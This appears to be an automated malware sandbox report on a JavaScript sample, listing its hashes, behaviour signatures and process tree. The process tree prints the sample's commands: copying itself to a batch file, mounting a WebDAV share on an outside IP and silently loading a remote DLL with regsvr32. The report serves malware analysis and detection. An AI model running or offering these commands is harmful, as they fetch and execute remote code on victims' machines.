Analysis
-
max time kernel
13s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
10/07/2024, 02:36
General
-
Target
f9f5309a666c11a1dfde7328aaddb9659cd67cc8a0a630f5c72f745f71bf175b.js
-
Size
5KB
-
MD5
e1f52912b78f8d846d64bc0b2f786af3
-
SHA1
41c8554f49050e8537c9484db23296243274f9ed
-
SHA256
f9f5309a666c11a1dfde7328aaddb9659cd67cc8a0a630f5c72f745f71bf175b
-
SHA512
f40fd070e0969506daaa5d6b5e44442d600f6c8a247de62a386a2fba26c7d74cdcd03ff3544d04c4b250572515cd728b661157260eb10cfb5aae74b3a104bc22
-
SSDEEP
96:RG6haFMl54aElbh4nRku2xNrWyEzKaYpRp2SAZGsAq/fqVaoLeMifJMd5WZlw6zw:aEvVdDw9HGnrkSe
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\f9f5309a666c11a1dfde7328aaddb9659cd67cc8a0a630f5c72f745f71bf175b.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\f9f5309a666c11a1dfde7328aaddb9659cd67cc8a0a630f5c72f745f71bf175b.js" "C:\Users\Admin\\gfywiu.bat" && "C:\Users\Admin\\gfywiu.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\364.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5e1f52912b78f8d846d64bc0b2f786af3
SHA141c8554f49050e8537c9484db23296243274f9ed
SHA256f9f5309a666c11a1dfde7328aaddb9659cd67cc8a0a630f5c72f745f71bf175b
SHA512f40fd070e0969506daaa5d6b5e44442d600f6c8a247de62a386a2fba26c7d74cdcd03ff3544d04c4b250572515cd728b661157260eb10cfb5aae74b3a104bc22